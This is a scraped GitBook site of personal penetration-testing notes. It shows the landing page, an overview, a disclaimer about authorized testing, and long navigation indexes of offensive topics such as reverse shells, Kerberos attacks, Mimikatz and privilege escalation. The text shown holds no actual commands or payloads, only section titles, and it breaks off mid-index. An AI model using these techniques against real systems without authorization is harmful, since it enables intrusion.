# Table of Contents - [/home/x3m1Sec/.pt-notes | Pentest Notes](#-home-x3m1sec-pt-notes-pentest-notes) - [/home/x3m1Sec/.pt-notes | Pentest Notes](#-home-x3m1sec-pt-notes-pentest-notes) - [Pentest Notes](#pentest-notes) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Protocols and Services | Pentest Notes](#protocols-and-services-pentest-notes) - [Information Gathering | Pentest Notes](#information-gathering-pentest-notes) - [Unknown](#unknown) - [Unknown](#unknown) - [FTP Port (21) | Pentest Notes](#ftp-port-21-pentest-notes) - [IMAP Ports (143,993) | Pentest Notes](#imap-ports-143-993-pentest-notes) - [DNS Port (53) | Pentest Notes](#dns-port-53-pentest-notes) - [TryHackMe | Pentest Notes](#tryhackme-pentest-notes) - [Resources | Pentest Notes](#resources-pentest-notes) - [CTFs | Pentest Notes](#ctfs-pentest-notes) - [Hack The Box | Pentest Notes](#hack-the-box-pentest-notes) - [Cheatsheets | Pentest Notes](#cheatsheets-pentest-notes) - [Road to certification | Pentest Notes](#road-to-certification-pentest-notes) - [Unknown](#unknown) - [Linux | Pentest Notes](#linux-pentest-notes) - [Hard | Pentest Notes](#hard-pentest-notes) - [Hard | Pentest Notes](#hard-pentest-notes) - [Easy | Pentest Notes](#easy-pentest-notes) - [eJPTv2 | Pentest Notes](#ejptv2-pentest-notes) - [Medium | Pentest Notes](#medium-pentest-notes) - [Medium | Pentest Notes](#medium-pentest-notes) - [Easy | Pentest Notes](#easy-pentest-notes) - [Windows | Pentest Notes](#windows-pentest-notes) - [My review | Pentest Notes](#my-review-pentest-notes) - [Default Passwords | Pentest Notes](#default-passwords-pentest-notes) - [Bug Bounty Tools | Pentest Notes](#bug-bounty-tools-pentest-notes) - [CPTS | Pentest Notes](#cpts-pentest-notes) - [OSCP | Pentest Notes](#oscp-pentest-notes) - [My review | Pentest Notes](#my-review-pentest-notes) - [Bug Bounty Hunting | Pentest Notes](#bug-bounty-hunting-pentest-notes) - [Cheat Sheets | Pentest Notes](#cheat-sheets-pentest-notes) - [Misc Snippets | Pentest Notes](#misc-snippets-pentest-notes) - [Powerup | Pentest Notes](#powerup-pentest-notes) - [Preparation | Pentest Notes](#preparation-pentest-notes) - [Web Applications | Pentest Notes](#web-applications-pentest-notes) - [Mimikatz | Pentest Notes](#mimikatz-pentest-notes) - [Kerberoast | Pentest Notes](#kerberoast-pentest-notes) - [Utilities, Scripts and Payloads | Pentest Notes](#utilities-scripts-and-payloads-pentest-notes) - [Hashcat Word lists and Rules | Pentest Notes](#hashcat-word-lists-and-rules-pentest-notes) - [Active Directory Pentesting | Pentest Notes](#active-directory-pentesting-pentest-notes) - [Windows Privilege Escalation | Pentest Notes](#windows-privilege-escalation-pentest-notes) - [File Transfers | Pentest Notes](#file-transfers-pentest-notes) - [Attacking Kerberos | Pentest Notes](#attacking-kerberos-pentest-notes) - [Unknown](#unknown) - [Programs, Jobs and Services | Pentest Notes](#programs-jobs-and-services-pentest-notes) - [Privileged Groups | Pentest Notes](#privileged-groups-pentest-notes) - [File System ACLs | Pentest Notes](#file-system-acls-pentest-notes) - [Living off the Land | Pentest Notes](#living-off-the-land-pentest-notes) - [Linux Privilege Escalation | Pentest Notes](#linux-privilege-escalation-pentest-notes) - [Services Hijacking | Pentest Notes](#services-hijacking-pentest-notes) - [Metasploit Modules | Pentest Notes](#metasploit-modules-pentest-notes) - [Capabilities Abuse | Pentest Notes](#capabilities-abuse-pentest-notes) - [Recent CVEs | Pentest Notes](#recent-cves-pentest-notes) - [Initial Enumeration | Pentest Notes](#initial-enumeration-pentest-notes) - [Shells and Payloads | Pentest Notes](#shells-and-payloads-pentest-notes) - [Environment Variables Abuse | Pentest Notes](#environment-variables-abuse-pentest-notes) - [Enumerating Users | Pentest Notes](#enumerating-users-pentest-notes) - [IPMI Port (623) | Pentest Notes](#ipmi-port-623-pentest-notes) - [Tools | Pentest Notes](#tools-pentest-notes) - [Fuzzing | Pentest Notes](#fuzzing-pentest-notes) - [User Account Control (UAC) Bypass | Pentest Notes](#user-account-control-uac-bypass-pentest-notes) - [Password Attacks | Pentest Notes](#password-attacks-pentest-notes) - [Spawn TTY Shells | Pentest Notes](#spawn-tty-shells-pentest-notes) - [HTTP Verb Tampering | Pentest Notes](#http-verb-tampering-pentest-notes) - [PriveEsc Checklist | Pentest Notes](#priveesc-checklist-pentest-notes) - [Kerberos Port (88) | Pentest Notes](#kerberos-port-88-pentest-notes) - [Web Attacks | Pentest Notes](#web-attacks-pentest-notes) - [Linux PrivEsc Summary | Pentest Notes](#linux-privesc-summary-pentest-notes) - [NFS Ports (111,2049) | Pentest Notes](#nfs-ports-111-2049-pentest-notes) - [Remote File Inclusion (RFI) | Pentest Notes](#remote-file-inclusion-rfi-pentest-notes) - [Built-in Groups Abuse | Pentest Notes](#built-in-groups-abuse-pentest-notes) - [WordPress | Pentest Notes](#wordpress-pentest-notes) - [Tomcat | Pentest Notes](#tomcat-pentest-notes) - [Drupal | Pentest Notes](#drupal-pentest-notes) - [Pivoting, Tunneling, Port Forwarding | Pentest Notes](#pivoting-tunneling-port-forwarding-pentest-notes) - [Gitlab | Pentest Notes](#gitlab-pentest-notes) - [CGI Applications | Pentest Notes](#cgi-applications-pentest-notes) - [osTicket | Pentest Notes](#osticket-pentest-notes) - [SMB Ports (139,445) | Pentest Notes](#smb-ports-139-445-pentest-notes) - [Impacket | Pentest Notes](#impacket-pentest-notes) - [Miscellaneous Techniques | Pentest Notes](#miscellaneous-techniques-pentest-notes) - [Enumerating Attack Vectors | Pentest Notes](#enumerating-attack-vectors-pentest-notes) - [Reverse shells | Pentest Notes](#reverse-shells-pentest-notes) - [OS Command Injection | Pentest Notes](#os-command-injection-pentest-notes) - [PostgreSQL Port (5432) | Pentest Notes](#postgresql-port-5432-pentest-notes) - [Apache Tomcat Ports (8080,8180) | Pentest Notes](#apache-tomcat-ports-8080-8180-pentest-notes) - [File Upload Vulnerabilities | Pentest Notes](#file-upload-vulnerabilities-pentest-notes) - [NetBIOS Ports (137,138,139) | Pentest Notes](#netbios-ports-137-138-139-pentest-notes) - [Joomla | Pentest Notes](#joomla-pentest-notes) - [Jenkins | Pentest Notes](#jenkins-pentest-notes) - [SAP Netweaver | Pentest Notes](#sap-netweaver-pentest-notes) - [Insecure Direct Object References (IDOR) | Pentest Notes](#insecure-direct-object-references-idor-pentest-notes) - [Metasploit Framework | Pentest Notes](#metasploit-framework-pentest-notes) - [Active Directory Certificate Services (ADCS) | Pentest Notes](#active-directory-certificate-services-adcs-pentest-notes) - [RDP Port (3389) | Pentest Notes](#rdp-port-3389-pentest-notes) - [RPCBind Ports (111,32771) | Pentest Notes](#rpcbind-ports-111-32771-pentest-notes) - [SQL Injection (SQLi) | Pentest Notes](#sql-injection-sqli-pentest-notes) - [Bloodhound | Pentest Notes](#bloodhound-pentest-notes) - [SNMP Ports (161,162) | Pentest Notes](#snmp-ports-161-162-pentest-notes) - [Java RMI Port (1099) | Pentest Notes](#java-rmi-port-1099-pentest-notes) - [Port 123 - NTP | Pentest Notes](#port-123-ntp-pentest-notes) - [Kerbrute | Pentest Notes](#kerbrute-pentest-notes) - [Excessive User Rights Abuse | Pentest Notes](#excessive-user-rights-abuse-pentest-notes) - [POP3 Port (110) | Pentest Notes](#pop3-port-110-pentest-notes) - [PRTG Network Monitor | Pentest Notes](#prtg-network-monitor-pentest-notes) - [BloodyAD | Pentest Notes](#bloodyad-pentest-notes) - [Enumerating Attack Vectors | Pentest Notes](#enumerating-attack-vectors-pentest-notes) - [SMTP Port (25) | Pentest Notes](#smtp-port-25-pentest-notes) - [Enumeration | Pentest Notes](#enumeration-pentest-notes) - [Web Service & API Attacks | Pentest Notes](#web-service-api-attacks-pentest-notes) - [Web Attacks | Pentest Notes](#web-attacks-pentest-notes) - [MSSQL Port (1433) | Pentest Notes](#mssql-port-1433-pentest-notes) - [Nmap | Pentest Notes](#nmap-pentest-notes) - [Server-side Attacks | Pentest Notes](#server-side-attacks-pentest-notes) - [LDAP Ports (389,636) | Pentest Notes](#ldap-ports-389-636-pentest-notes) - [Attacking Common Applications | Pentest Notes](#attacking-common-applications-pentest-notes) - [Linux Privilege Escalation | Pentest Notes](#linux-privilege-escalation-pentest-notes) - [Password-cracking | Pentest Notes](#password-cracking-pentest-notes) - [Splunk | Pentest Notes](#splunk-pentest-notes) - [Sub-domain Enumeration | Pentest Notes](#sub-domain-enumeration-pentest-notes) - [TIPS | Pentest Notes](#tips-pentest-notes) - [Local File Inclusion (LFI) | Pentest Notes](#local-file-inclusion-lfi-pentest-notes) - [Attacking Common Services | Pentest Notes](#attacking-common-services-pentest-notes) - [Web Technologies | Pentest Notes](#web-technologies-pentest-notes) - [Windows Privilege Escalation | Pentest Notes](#windows-privilege-escalation-pentest-notes) - [Notes | Pentest Notes](#notes-pentest-notes) - [Active Directory Enumeration & Attacks | Pentest Notes](#active-directory-enumeration-attacks-pentest-notes) - [PriveEsc checklist | Pentest Notes](#priveesc-checklist-pentest-notes) - [Oracle TNS Port (1521) | Pentest Notes](#oracle-tns-port-1521-pentest-notes) - [Abusing ACLs/ACEs | Pentest Notes](#abusing-acls-aces-pentest-notes) - [Upgrading-tty-shell | Pentest Notes](#upgrading-tty-shell-pentest-notes) - [Nmap Commands for Port Discovery | Pentest Notes](#nmap-commands-for-port-discovery-pentest-notes) - [LDAPSearch | Pentest Notes](#ldapsearch-pentest-notes) - [PowerView.py | Pentest Notes](#powerview-py-pentest-notes) - [XML External Entities (XXE) | Pentest Notes](#xml-external-entities-xxe-pentest-notes) - [Microsoft IIS | Pentest Notes](#microsoft-iis-pentest-notes) - [Command-injections | Pentest Notes](#command-injections-pentest-notes) - [Password-attacks | Pentest Notes](#password-attacks-pentest-notes) - [Ligolo-ng | Pentest Notes](#ligolo-ng-pentest-notes) - [XSS | Pentest Notes](#xss-pentest-notes) --- # /home/x3m1Sec/.pt-notes | Pentest Notes For the complete documentation index, see [llms.txt](https://x3m1sec.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://x3m1sec.gitbook.io/notes/readme.md) . ![](https://x3m1sec.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fimages.unsplash.com%2Fphoto-1514168757508-07ffe9ae125b%3Fcrop%3Dentropy%26cs%3Dsrgb%26fm%3Djpg%26ixid%3DM3wxOTcwMjR8MHwxfHNlYXJjaHwzfHxoYWNraW5nfGVufDB8fHx8MTcyMjUxNjMyMHww%26ixlib%3Drb-4.0.3%26q%3D85&width=768&dpr=3&quality=100&sign=5c4fdb1dc4c1f4d22259167f48e26b52&sv=3) Cover 🏠 /home/x3m1Sec/.pt-notes[](https://x3m1sec.gitbook.io/#home-x3m1sec-.pt-notes) --------------------------------------------------------------------------------- Welcome to my penetration testing notes page - a project started with the idea to share and document my knowledge gained in the world of offensive security. My current knowledge comes from CTFs, eJPT and currently CPTS certification. * * * ### **About me**[](https://x3m1sec.gitbook.io/#about-me) My Profiles[](https://x3m1sec.gitbook.io/#my-profiles) [LinkedIn](https://x3m1sec.gitbook.io/www.linkedin.com/in/josemiguelromeroflores) , [GitHub](https://github.com/x3m1sec) , [TryHackMe](https://tryhackme.com/p/x3m1Sec) Certifications[](https://x3m1sec.gitbook.io/#certifications) [eJPT](https://certs.ine.com/3adc5ed1-3758-4a19-a59a-827d27782417#acc.tF0zCEur) , [TryHackMe](https://pwnrabbithole.es/files/OffensiveLearningPath.jpeg) , [CHEE](https://pwnrabbithole.es/files/CHEE.jpeg) , [CPHEE](https://pwnrabbithole.es/files/CPHE.jpeg) ### **Disclaimer**[](https://x3m1sec.gitbook.io/#disclaimer) > This page is intended for educational and informational purposes only. The content is provided "as is" without warranties of accuracy, completeness, or reliability. Any use of this information is at your own risk. The author is not responsible for any loss, damage, or consequences arising from its use. The techniques described should never be used for illegal or unethical activities. By using this content, you accept full responsibility for your actions and release the author from any liability. [NextPentest Notes](https://x3m1sec.gitbook.io/notes/pentest-notes) Last updated 1 year ago --- # /home/x3m1Sec/.pt-notes | Pentest Notes For the complete documentation index, see [llms.txt](https://x3m1sec.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://x3m1sec.gitbook.io/notes/readme.md) . ![](https://x3m1sec.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fimages.unsplash.com%2Fphoto-1514168757508-07ffe9ae125b%3Fcrop%3Dentropy%26cs%3Dsrgb%26fm%3Djpg%26ixid%3DM3wxOTcwMjR8MHwxfHNlYXJjaHwzfHxoYWNraW5nfGVufDB8fHx8MTcyMjUxNjMyMHww%26ixlib%3Drb-4.0.3%26q%3D85&width=768&dpr=3&quality=100&sign=5c4fdb1dc4c1f4d22259167f48e26b52&sv=3) Cover 🏠 /home/x3m1Sec/.pt-notes[](https://x3m1sec.gitbook.io/notes#home-x3m1sec-.pt-notes) -------------------------------------------------------------------------------------- Welcome to my penetration testing notes page - a project started with the idea to share and document my knowledge gained in the world of offensive security. My current knowledge comes from CTFs, eJPT and currently CPTS certification. * * * ### **About me**[](https://x3m1sec.gitbook.io/notes#about-me) My Profiles[](https://x3m1sec.gitbook.io/notes#my-profiles) [LinkedIn](https://x3m1sec.gitbook.io/www.linkedin.com/in/josemiguelromeroflores) , [GitHub](https://github.com/x3m1sec) , [TryHackMe](https://tryhackme.com/p/x3m1Sec) Certifications[](https://x3m1sec.gitbook.io/notes#certifications) [eJPT](https://certs.ine.com/3adc5ed1-3758-4a19-a59a-827d27782417#acc.tF0zCEur) , [TryHackMe](https://pwnrabbithole.es/files/OffensiveLearningPath.jpeg) , [CHEE](https://pwnrabbithole.es/files/CHEE.jpeg) , [CPHEE](https://pwnrabbithole.es/files/CPHE.jpeg) ### **Disclaimer**[](https://x3m1sec.gitbook.io/notes#disclaimer) > This page is intended for educational and informational purposes only. The content is provided "as is" without warranties of accuracy, completeness, or reliability. Any use of this information is at your own risk. The author is not responsible for any loss, damage, or consequences arising from its use. The techniques described should never be used for illegal or unethical activities. By using this content, you accept full responsibility for your actions and release the author from any liability. [NextPentest Notes](https://x3m1sec.gitbook.io/notes/pentest-notes) Last updated 1 year ago --- # Pentest Notes For the complete documentation index, see [llms.txt](https://x3m1sec.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://x3m1sec.gitbook.io/notes/pentest-notes.md) . Welcome to my comprehensive collection of penetration testing notes and resources. This repository serves as both a personal reference and a knowledge-sharing platform for the security community. Overview[](https://x3m1sec.gitbook.io/notes/pentest-notes#overview) -------------------------------------------------------------------- These notes cover a wide range of penetration testing topics, methodologies, and techniques that I've gathered through hands-on experience, courses, and continuous learning. The content is organized into specialized sections for easy navigation. Contents[](https://x3m1sec.gitbook.io/notes/pentest-notes#contents) -------------------------------------------------------------------- * **Information Gathering**: Reconnaissance techniques and tools for gathering intelligence on targets * **Protocols and Services**: Exploitation methods for common network protocols and services * **Web Applications**: Vulnerabilities, attacks, and security testing for web applications * **Active Directory**: Techniques for penetrating and moving laterally within Windows domains * **Linux Privilege Escalation**: Methods to escalate privileges on Linux systems * **Windows Privilege Escalation**: Techniques for gaining higher privileges on Windows systems * **Bug Bounty Hunting**: Resources and methodologies for successful bug bounty hunting * **Utilities, Scripts and Payloads**: Collection of useful tools and code for penetration testing Purpose[](https://x3m1sec.gitbook.io/notes/pentest-notes#purpose) ------------------------------------------------------------------ These notes are intended to: * Serve as a quick reference during penetration tests and security assessments * Document techniques and methodologies for future reference * Share knowledge with the security community * Track my progress and growth in the cybersecurity field Disclaimer[](https://x3m1sec.gitbook.io/notes/pentest-notes#disclaimer) ------------------------------------------------------------------------ These techniques should only be used in environments where you have explicit permission to test. Always practice ethical hacking and respect legal boundaries. Contributing[](https://x3m1sec.gitbook.io/notes/pentest-notes#contributing) ---------------------------------------------------------------------------- This is a living document that's regularly updated as I discover new techniques or refine existing ones. Feel free to suggest additions or corrections if you find something that could be improved. [Previous/home/x3m1Sec/.pt-notes](https://x3m1sec.gitbook.io/notes) [NextInformation Gathering](https://x3m1sec.gitbook.io/notes/pentest-notes/information-gathering) Last updated 1 year ago --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://x3m1sec.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://x3m1sec.gitbook.io/notes/pentest-notes.md). # Pentest Notes Welcome to my comprehensive collection of penetration testing notes and resources. This repository serves as both a personal reference and a knowledge-sharing platform for the security community. ## Overview These notes cover a wide range of penetration testing topics, methodologies, and techniques that I've gathered through hands-on experience, courses, and continuous learning. The content is organized into specialized sections for easy navigation. ## Contents \* \*\*Information Gathering\*\*: Reconnaissance techniques and tools for gathering intelligence on targets \* \*\*Protocols and Services\*\*: Exploitation methods for common network protocols and services \* \*\*Web Applications\*\*: Vulnerabilities, attacks, and security testing for web applications \* \*\*Active Directory\*\*: Techniques for penetrating and moving laterally within Windows domains \* \*\*Linux Privilege Escalation\*\*: Methods to escalate privileges on Linux systems \* \*\*Windows Privilege Escalation\*\*: Techniques for gaining higher privileges on Windows systems \* \*\*Bug Bounty Hunting\*\*: Resources and methodologies for successful bug bounty hunting \* \*\*Utilities, Scripts and Payloads\*\*: Collection of useful tools and code for penetration testing ## Purpose These notes are intended to: \* Serve as a quick reference during penetration tests and security assessments \* Document techniques and methodologies for future reference \* Share knowledge with the security community \* Track my progress and growth in the cybersecurity field ## Disclaimer These techniques should only be used in environments where you have explicit permission to test. Always practice ethical hacking and respect legal boundaries. ## Contributing This is a living document that's regularly updated as I discover new techniques or refine existing ones. Feel free to suggest additions or corrections if you find something that could be improved. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://x3m1sec.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://x3m1sec.gitbook.io/notes/readme.md). # /home/x3m1Sec/.pt-notes !\[Cover\](https://images.unsplash.com/photo-1514168757508-07ffe9ae125b?crop=entropy\\&cs=srgb\\&fm=jpg\\&ixid=M3wxOTcwMjR8MHwxfHNlYXJjaHwzfHxoYWNraW5nfGVufDB8fHx8MTcyMjUxNjMyMHww\\&ixlib=rb-4.0.3\\&q=85) ## 🏠 /home/x3m1Sec/.pt-notes Welcome to my penetration testing notes page - a project started with the idea to share and document my knowledge gained in the world of offensive security. My current knowledge comes from CTFs, eJPT and currently CPTS certification. \*\*\* ### \*\*About me\*\* My Profiles \[LinkedIn\](https://x3m1sec.gitbook.io/notes/www.linkedin.com/in/josemiguelromeroflores), \[GitHub\](https://github.com/x3m1sec), \[TryHackMe\](https://tryhackme.com/p/x3m1Sec) Certifications \[eJPT\](https://certs.ine.com/3adc5ed1-3758-4a19-a59a-827d27782417#acc.tF0zCEur), \[TryHackMe\](https://pwnrabbithole.es/files/OffensiveLearningPath.jpeg), \[CHEE\](https://pwnrabbithole.es/files/CHEE.jpeg), \[CPHEE\](https://pwnrabbithole.es/files/CPHE.jpeg) \### \*\*Disclaimer\*\* > This page is intended for educational and informational purposes only.\\ > The content is provided "as is" without warranties of accuracy, completeness, or reliability. Any use of this information is at your own risk. The author is not responsible for any loss, damage, or consequences arising from its use. The techniques described should never be used for illegal or unethical activities. By using this content, you accept full responsibility for your actions and release the author from any liability. --- # Unknown \# Pentest Notes ## notes - \[/home/x3m1Sec/.pt-notes\](https://x3m1sec.gitbook.io/notes/readme.md) - \[Pentest Notes\](https://x3m1sec.gitbook.io/notes/pentest-notes.md) - \[Information Gathering\](https://x3m1sec.gitbook.io/notes/pentest-notes/information-gathering.md) - \[Protocols and Services\](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services.md) - \[DNS Port (53)\](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/port-53-dns.md) - \[FTP Port (21)\](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/port-21-or-ftp.md) - \[IMAP Ports (143,993)\](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-143-993-imap.md) - \[IPMI Port (623)\](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-623-ipmi.md) - \[Kerberos Port (88)\](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/port-88-or-kerberos.md) - \[MSSQL Port (1433)\](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-1433-mssql.md) - \[MySQL Port (3306)\](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-3306-mysql.md) - \[NFS Ports (111,2049)\](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-2049-nfs.md) - \[NetBIOS Ports (137,138,139)\](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-137-or-138-or-139-or-netbios.md) - \[Oracle TNS Port (1521)\](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/oracle-tns-port-1521.md) - \[POP3 Port (110)\](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/pop3-port-110.md) - \[PostgreSQL Port (5432)\](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres.md) - \[RDP Port (3389)\](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/port-3389-or-rdp.md) - \[SMB Ports (139,445)\](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-139-445-smb.md) - \[SMTP Port (25)\](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/25-smtp.md) - \[SNMP Ports (161,162)\](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-161-162-snmp.md) - \[Java RMI Port (1099)\](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-1099-or-java-rmi.md) - \[LDAP Ports (389,636)\](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-389-636-ldap.md) - \[Apache Tomcat Ports (8080,8180)\](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-8080-8180-apache-tomcat.md) - \[Port 123 - NTP\](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/port-123-or-ntp.md) - \[RPCBind Ports (111,32771)\](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-111-or-32771-or-rpcbind.md) - \[Email Services\](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/email-services.md) - \[Nmap Commands for Port Discovery\](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/nmap-commands-for-port-discovery.md) - \[Web Applications\](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications.md) - \[Web Attacks\](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks.md) - \[Cross Site Scripting (XSS)\](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/cross-site-scripting-xss.md) - \[SQL Injection (SQLi)\](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/sql-injection.md) - \[File Upload Vulnerabilities\](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/file-uploads.md) - \[Insecure Direct Object References (IDOR)\](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/insecure-direct-object-references-idor.md) - \[OS Command Injection\](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/os-command-injection.md) - \[Local File Inclusion (LFI)\](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/local-file-inclusion-lfi.md) - \[Remote File Inclusion (RFI)\](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/remote-file-inclusion-rfi.md) - \[XML External Entities (XXE)\](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/xml-external-entities-xxe.md) - \[HTTP Verb Tampering\](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/http-verb-tampering.md) - \[Sub-domain Enumeration\](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/sub-domain-enumeration.md) - \[Web Technologies\](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies.md) - \[Tomcat\](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/tomcat.md) - \[CGI Applications\](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/cgi-applications.md) - \[WordPress\](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/wordpress.md) - \[SAP Netweaver\](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/sap-netweaver.md) - \[Joomla\](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/joomla.md) - \[Drupal\](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/drupal.md) - \[Gitlab\](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/gitlab.md) - \[Jenkins\](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/jenkins.md) - \[Microsoft IIS\](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/microsoft-iis.md) - \[osTicket\](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/osticket.md) - \[PRTG Network Monitor\](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/prtg-network-monitor.md) - \[Splunk\](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-technologies/splunk.md) - \[Fuzzing\](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/fuzzing.md) - \[Active Directory Pentesting\](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting.md) - \[Initial Enumeration\](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/initial-enumeration.md) - \[Enumerating Users\](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/initial-enumeration/ad-userenum.md) - \[Abusing ACLs/ACEs\](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/ad-acl-abuse.md) - \[Active Directory Certificate Services (ADCS)\](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds.md) - \[Attacking Kerberos\](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/attacking-kerberos.md) - \[Bloodhound\](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/bloodhound.md) - \[Tools\](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/tools.md) - \[BloodyAD\](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/tools/bloodyad.md) - \[Impacket\](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/tools/impacket.md) - \[Kerbrute\](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/tools/kerbrute.md) - \[LDAPSearch\](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/tools/ldapsearch.md) - \[PowerView.py\](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/tools/powerview.md) - \[Linux Privilege Escalation\](https://x3m1sec.gitbook.io/notes/pentest-notes/linux-privilege-escalation.md) - \[Linux PrivEsc Summary\](https://x3m1sec.gitbook.io/notes/pentest-notes/linux-privilege-escalation/linux-privilege-escalation-techniques.md) - \[PriveEsc Checklist\](https://x3m1sec.gitbook.io/notes/pentest-notes/linux-privilege-escalation/privilege-escalation-checklist.md) - \[Enumerating Attack Vectors\](https://x3m1sec.gitbook.io/notes/pentest-notes/linux-privilege-escalation/enumerating-attack-vectors.md) - \[Privileged Groups\](https://x3m1sec.gitbook.io/notes/pentest-notes/linux-privilege-escalation/privileged-groups.md) - \[Environment Variables Abuse\](https://x3m1sec.gitbook.io/notes/pentest-notes/linux-privilege-escalation/environment-variables-abuse.md) - \[Capabilities Abuse\](https://x3m1sec.gitbook.io/notes/pentest-notes/linux-privilege-escalation/capabilities-abuse.md) - \[Programs, Jobs and Services\](https://x3m1sec.gitbook.io/notes/pentest-notes/linux-privilege-escalation/programs-jobs-and-services.md) - \[Miscellaneous Techniques\](https://x3m1sec.gitbook.io/notes/pentest-notes/linux-privilege-escalation/miscellaneous-techniques.md) - \[Recent CVEs\](https://x3m1sec.gitbook.io/notes/pentest-notes/linux-privilege-escalation/recent-cves.md) - \[Windows Privilege Escalation\](https://x3m1sec.gitbook.io/notes/pentest-notes/windows-privilege-escalation.md) - \[PriveEsc checklist\](https://x3m1sec.gitbook.io/notes/pentest-notes/windows-privilege-escalation/privilege-escalation-checklist.md) - \[Enumerating Attack Vectors\](https://x3m1sec.gitbook.io/notes/pentest-notes/windows-privilege-escalation/enumerating-attack-vectors.md) - \[Excessive User Rights Abuse\](https://x3m1sec.gitbook.io/notes/pentest-notes/windows-privilege-escalation/excessive-user-rights-abuse.md) - \[Built-in Groups Abuse\](https://x3m1sec.gitbook.io/notes/pentest-notes/windows-privilege-escalation/built-in-groups-abuse.md) - \[File System ACLs\](https://x3m1sec.gitbook.io/notes/pentest-notes/windows-privilege-escalation/file-system-acls.md) - \[Services Hijacking\](https://x3m1sec.gitbook.io/notes/pentest-notes/windows-privilege-escalation/unquoted-service-paths.md) - \[User Account Control (UAC) Bypass\](https://x3m1sec.gitbook.io/notes/pentest-notes/windows-privilege-escalation/user-account-control-uac-bypass.md) - \[Living off the Land\](https://x3m1sec.gitbook.io/notes/pentest-notes/windows-privilege-escalation/living-off-the-land.md) - \[Bug Bounty Hunting\](https://x3m1sec.gitbook.io/notes/pentest-notes/bug-bounty-hunting.md) - \[Bug Bounty Tools\](https://x3m1sec.gitbook.io/notes/pentest-notes/bug-bounty-hunting/bug-bounty-tools.md) - \[Utilities, Scripts and 